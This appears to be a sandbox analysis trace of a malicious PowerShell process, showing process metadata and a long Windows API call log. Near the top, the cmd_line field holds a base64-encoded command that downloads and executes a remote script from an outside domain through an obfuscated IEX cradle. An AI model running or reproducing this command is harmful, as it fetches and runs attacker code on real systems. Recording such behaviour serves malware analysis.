	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 530
	os_tid = 0x1340


Thread:
	id = 556
	os_tid = 0xc3c


Thread:
	id = 561
	os_tid = 0x11c


Process:
	id = "102"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0xc59b000"
	os_pid = "0x1354"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 532
	os_tid = 0x1358

	[0784.483] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0789.529] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0789.529] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0789.529] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0789.529] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0794.772] sprintf_s (in: _DstBuf=0x16f398, _DstSize=0x11, _Format="get_%s" | out: _DstBuf="get_MemberType") returned 14
	[0798.904] GetVersionExW (in: lpVersionInformation=0x16dea0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x16dea0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0798.906] GetVersionExW (in: lpVersionInformation=0x16dea0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x16dea0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0798.914] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0798.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16db60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0798.919] GetVersionExW (in: lpVersionInformation=0x16dc10*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x16dc10*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0798.919] SetErrorMode (uMode=0x1) returned 0x1
	[0798.920] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x16dd70 | out: lpFileInformation=0x16dd70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0798.922] SetErrorMode (uMode=0x1) returned 0x1
	[0798.924] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x16dfe0 | out: lpdwHandle=0x16dfe0) returned 0x94c
	[0798.927] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2db72d8 | out: lpData=0x2db72d8) returned 1
	[0798.929] VerQueryValueW (in: pBlock=0x2db72d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x16df58, puLen=0x16df50 | out: lplpBuffer=0x16df58*=0x2db7374, puLen=0x16df50) returned 1
	[0798.931] lstrlenW (lpString="䅁") returned 1
	[0798.940] VerQueryValueW (in: pBlock=0x2db72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x16dec8, puLen=0x16dec0 | out: lplpBuffer=0x16dec8*=0x2db7450, puLen=0x16dec0) returned 1
	[0798.940] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0799.853] CoTaskMemAlloc (cb=0x2e) returned 0x322f00
	[0799.853] lstrcpyW (in: lpString1=0x322f00, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0799.854] CoTaskMemFree (pv=0x322f00) 
	[0799.854] VerQueryValueW (in: pBlock=0x2db72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x16dec8, puLen=0x16dec0 | out: lplpBuffer=0x16dec8*=0x2db74a4, puLen=0x16dec0) returned 1
	[0799.854] lstrlenW (lpString="System.Management.Automation") returned 28
	[0799.854] CoTaskMemAlloc (cb=0x3c) returned 0x2e1550
	[0799.854] lstrcpyW (in: lpString1=0x2e1550, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0799.855] CoTaskMemFree (pv=0x2e1550) 
	[0799.855] VerQueryValueW (in: pBlock=0x2db72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x16dec8, puLen=0x16dec0 | out: lplpBuffer=0x16dec8*=0x2db7500, puLen=0x16dec0) returned 1
	[0799.855] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0799.855] CoTaskMemAlloc (cb=0x20) returned 0x328920
	[0799.855] lstrcpyW (in: lpString1=0x328920, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0799.855] CoTaskMemFree (pv=0x328920) 
	[0799.855] VerQueryValueW (in: pBlock=0x2db72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x16dec8, puLen=0x16dec0 | out: lplpBuffer=0x16dec8*=0x2db7540, puLen=0x16dec0) returned 1
	[0799.855] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0799.855] CoTaskMemAlloc (cb=0x44) returned 0x2e1550
	[0799.855] lstrcpyW (in: lpString1=0x2e1550, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0799.855] CoTaskMemFree (pv=0x2e1550) 
	[0799.855] VerQueryValueW (in: pBlock=0x2db72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x16dec8, puLen=0x16dec0 | out: lplpBuffer=0x16dec8*=0x2db75a8, puLen=0x16dec0) returned 1
	[0799.855] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0799.855] CoTaskMemAlloc (cb=0x76) returned 0x2d0f80
	[0799.855] lstrcpyW (in: lpString1=0x2d0f80, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0799.855] CoTaskMemFree (pv=0x2d0f80) 
	[0799.855] VerQueryValueW (in: pBlock=0x2db72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x16dec8, puLen=0x16dec0 | out: lplpBuffer=0x16dec8*=0x2db7644, puLen=0x16dec0) returned 1
	[0799.855] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0799.855] CoTaskMemAlloc (cb=0x44) returned 0x2e1550
	[0799.855] lstrcpyW (in: lpString1=0x2e1550, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0799.855] CoTaskMemFree (pv=0x2e1550) 
	[0799.855] VerQueryValueW (in: pBlock=0x2db72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x16dec8, puLen=0x16dec0 | out: lplpBuffer=0x16dec8*=0x2db76a8, puLen=0x16dec0) returned 1
	[0799.855] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0799.855] CoTaskMemAlloc (cb=0x58) returned 0x2856e0
	[0799.855] lstrcpyW (in: lpString1=0x2856e0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0799.855] CoTaskMemFree (pv=0x2856e0) 
	[0799.855] VerQueryValueW (in: pBlock=0x2db72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x16dec8, puLen=0x16dec0 | out: lplpBuffer=0x16dec8*=0x2db7724, puLen=0x16dec0) returned 1
	[0799.855] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0799.856] CoTaskMemAlloc (cb=0x20) returned 0x328920
	[0799.856] lstrcpyW (in: lpString1=0x328920, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0799.856] CoTaskMemFree (pv=0x328920) 
	[0799.856] VerQueryValueW (in: pBlock=0x2db72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x16dec8, puLen=0x16dec0 | out: lplpBuffer=0x16dec8*=0x2db73cc, puLen=0x16dec0) returned 1
	[0799.856] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0799.856] CoTaskMemAlloc (cb=0x66) returned 0x29b990
	[0799.856] lstrcpyW (in: lpString1=0x29b990, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0799.856] CoTaskMemFree (pv=0x29b990) 
	[0799.856] VerQueryValueW (in: pBlock=0x2db72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x16dec8, puLen=0x16dec0 | out: lplpBuffer=0x16dec8*=0x0, puLen=0x16dec0) returned 0
	[0799.856] VerQueryValueW (in: pBlock=0x2db72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x16dec8, puLen=0x16dec0 | out: lplpBuffer=0x16dec8*=0x0, puLen=0x16dec0) returned 0
	[0799.856] VerQueryValueW (in: pBlock=0x2db72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x16dec8, puLen=0x16dec0 | out: lplpBuffer=0x16dec8*=0x0, puLen=0x16dec0) returned 0
	[0799.856] VerQueryValueW (in: pBlock=0x2db72d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x16de98, puLen=0x16de90 | out: lplpBuffer=0x16de98*=0x2db7374, puLen=0x16de90) returned 1
	[0800.761] CoTaskMemAlloc (cb=0x204) returned 0x2d42b0
	[0800.761] VerLanguageNameW (in: wLang=0x0, szLang=0x2d42b0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0800.762] CoTaskMemFree (pv=0x2d42b0) 
	[0800.762] VerQueryValueW (in: pBlock=0x2db72d8, lpSubBlock="\\", lplpBuffer=0x16dee8, puLen=0x16dee0 | out: lplpBuffer=0x16dee8*=0x2db7300, puLen=0x16dee0) returned 1
	[0801.687] GetCurrentProcessId () returned 0x1354
	[0808.037] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x16ce10 | out: lpLuid=0x16ce10*(LowPart=0x14, HighPart=0)) returned 1
	[0808.040] GetCurrentProcess () returned 0xffffffffffffffff
	[0808.041] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x16ce30 | out: TokenHandle=0x16ce30*=0x218) returned 1
	[0808.042] AdjustTokenPrivileges (in: TokenHandle=0x218, DisableAllPrivileges=0, NewState=0x2dbab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0808.960] CloseHandle (hObject=0x218) returned 1
	[0811.254] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1354) returned 0x218
	[0811.264] EnumProcessModules (in: hProcess=0x218, lphModule=0x2dbabb8, cb=0x200, lpcbNeeded=0x16de48 | out: lphModule=0x2dbabb8, lpcbNeeded=0x16de48) returned 1
	[0811.267] GetModuleInformation (in: hProcess=0x218, hModule=0x13f370000, lpmodinfo=0x2dbae28, cb=0x18 | out: lpmodinfo=0x2dbae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0811.268] CoTaskMemAlloc (cb=0x804) returned 0x329cd0
	[0811.268] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x13f370000, lpBaseName=0x329cd0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0811.268] CoTaskMemFree (pv=0x329cd0) 
	[0811.269] CoTaskMemAlloc (cb=0x804) returned 0x329cd0
	[0811.269] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x13f370000, lpFilename=0x329cd0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0811.269] CoTaskMemFree (pv=0x329cd0) 
	[0811.270] CloseHandle (hObject=0x218) returned 1
	[0812.429] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x1354) returned 0x218
	[0812.430] GetExitCodeProcess (in: hProcess=0x218, lpExitCode=0x16df78 | out: lpExitCode=0x16df78*=0x103) returned 1
	[0812.434] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12dbb088, Length=0x20000, ResultLength=0x16df40 | out: SystemInformation=0x12dbb088, ResultLength=0x16df40*=0x437a8) returned 0xc0000004
	[0812.438] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12ddb0b8, Length=0x45fa8, ResultLength=0x16df40 | out: SystemInformation=0x12ddb0b8, ResultLength=0x16df40*=0x437a8) returned 0x0
	[0813.967] EnumWindows (lpEnumFunc=0x2d366ac, lParam=0x0) 
	[0817.197] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x4d0
	[0818.724] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x558
	[0819.950] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x4d0
	[0820.758] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x4d0
	[0820.758] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x4d0
	[0820.758] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x538
	[0820.758] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x4d0
	[0820.758] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x778
	[0820.759] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x778
	[0820.759] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x4d0
	[0820.759] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x4d0
	[0820.759] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x4d0
	[0820.759] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x4d0
	[0820.759] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x4d0
	[0820.759] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x4d0
	[0820.759] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x4d0
	[0820.760] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x4d0
	[0820.760] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x460
	[0820.760] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x4d0
	[0820.760] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x4d0
	[0820.760] GetWindowThreadProcessId (in: hWnd=0x10ab6, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1f18
	[0820.760] GetWindowThreadProcessId (in: hWnd=0x10ab4, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x20a8
	[0820.760] GetWindowThreadProcessId (in: hWnd=0x10a78, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x2004
	[0820.760] GetWindowThreadProcessId (in: hWnd=0x10a68, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1f88
	[0820.761] GetWindowThreadProcessId (in: hWnd=0x10a4a, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1f84
	[0820.761] GetWindowThreadProcessId (in: hWnd=0x20a3e, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x2050
	[0820.761] GetWindowThreadProcessId (in: hWnd=0x40528, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1e04
	[0820.761] GetWindowThreadProcessId (in: hWnd=0x20816, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1ecc
	[0820.761] GetWindowThreadProcessId (in: hWnd=0x10a2c, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1e64
	[0820.761] GetWindowThreadProcessId (in: hWnd=0x2056e, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1b58
	[0820.761] GetWindowThreadProcessId (in: hWnd=0x10a1e, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1e94
	[0820.761] GetWindowThreadProcessId (in: hWnd=0x10a0e, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1e28
	[0820.762] GetWindowThreadProcessId (in: hWnd=0x10a0a, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1df8
	[0820.762] GetWindowThreadProcessId (in: hWnd=0x10a06, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1da8
	[0820.762] GetWindowThreadProcessId (in: hWnd=0x3060a, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1c70
	[0820.762] GetWindowThreadProcessId (in: hWnd=0x109ec, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x163c
	[0820.762] GetWindowThreadProcessId (in: hWnd=0x109de, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1a10
	[0820.762] GetWindowThreadProcessId (in: hWnd=0x109c4, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x186c
	[0820.762] GetWindowThreadProcessId (in: hWnd=0x109b4, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1d74
	[0820.762] GetWindowThreadProcessId (in: hWnd=0x1099a, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x4c8
	[0820.763] GetWindowThreadProcessId (in: hWnd=0x1098c, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1960
	[0820.763] GetWindowThreadProcessId (in: hWnd=0x1097c, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1ce4
	[0820.763] GetWindowThreadProcessId (in: hWnd=0x1093c, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1b24
	[0820.763] GetWindowThreadProcessId (in: hWnd=0x20942, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x14e0
	[0820.763] GetWindowThreadProcessId (in: hWnd=0x204b0, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x17f0
	[0820.763] GetWindowThreadProcessId (in: hWnd=0x10952, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x854
	[0820.763] GetWindowThreadProcessId (in: hWnd=0x10950, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1268
	[0820.763] GetWindowThreadProcessId (in: hWnd=0x1094e, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1624
	[0820.763] GetWindowThreadProcessId (in: hWnd=0x1094c, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1b9c
	[0820.764] GetWindowThreadProcessId (in: hWnd=0x1094a, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x16f4
	[0820.764] GetWindowThreadProcessId (in: hWnd=0x10948, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x145c
	[0820.764] GetWindowThreadProcessId (in: hWnd=0x1093e, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x17d0
	[0820.764] GetWindowThreadProcessId (in: hWnd=0x206ba, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1d28
	[0820.764] GetWindowThreadProcessId (in: hWnd=0x1093a, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0xcb8
	[0820.764] GetWindowThreadProcessId (in: hWnd=0x20614, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1190
	[0820.764] GetWindowThreadProcessId (in: hWnd=0x2041c, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x3a8
	[0820.764] GetWindowThreadProcessId (in: hWnd=0x20420, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1bd0
	[0820.765] GetWindowThreadProcessId (in: hWnd=0x304c0, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1bfc
	[0820.765] GetWindowThreadProcessId (in: hWnd=0x108b8, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1a78
	[0820.765] GetWindowThreadProcessId (in: hWnd=0x108b2, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1b90
	[0820.765] GetWindowThreadProcessId (in: hWnd=0x108ac, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1b04
	[0820.765] GetWindowThreadProcessId (in: hWnd=0x108a0, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1b34
	[0820.765] GetWindowThreadProcessId (in: hWnd=0x1088e, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1b64
	[0820.765] GetWindowThreadProcessId (in: hWnd=0x1087c, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1bb0
	[0820.765] GetWindowThreadProcessId (in: hWnd=0x204f6, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1acc
	[0820.766] GetWindowThreadProcessId (in: hWnd=0x1083e, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1a2c
	[0820.766] GetWindowThreadProcessId (in: hWnd=0x2042c, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x19a8
	[0820.766] GetWindowThreadProcessId (in: hWnd=0x10836, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1944
	[0820.766] GetWindowThreadProcessId (in: hWnd=0x10826, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x18c8
	[0820.766] GetWindowThreadProcessId (in: hWnd=0x10822, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x18ac
	[0820.766] GetWindowThreadProcessId (in: hWnd=0x1081e, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x18ec
	[0820.766] GetWindowThreadProcessId (in: hWnd=0x1081a, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1898
	[0820.766] GetWindowThreadProcessId (in: hWnd=0x10810, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0xc98
	[0820.766] GetWindowThreadProcessId (in: hWnd=0x1080a, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x153c
	[0820.767] GetWindowThreadProcessId (in: hWnd=0x10806, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1808
	[0820.767] GetWindowThreadProcessId (in: hWnd=0x10790, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x12a4
	[0820.767] GetWindowThreadProcessId (in: hWnd=0x1078e, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1740
	[0820.767] GetWindowThreadProcessId (in: hWnd=0x10784, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x16c4
	[0820.767] GetWindowThreadProcessId (in: hWnd=0x107c2, lpdwProcessId=0x16dca0 | out: lpdwProcessId=0x16dca0) returned 0x1820
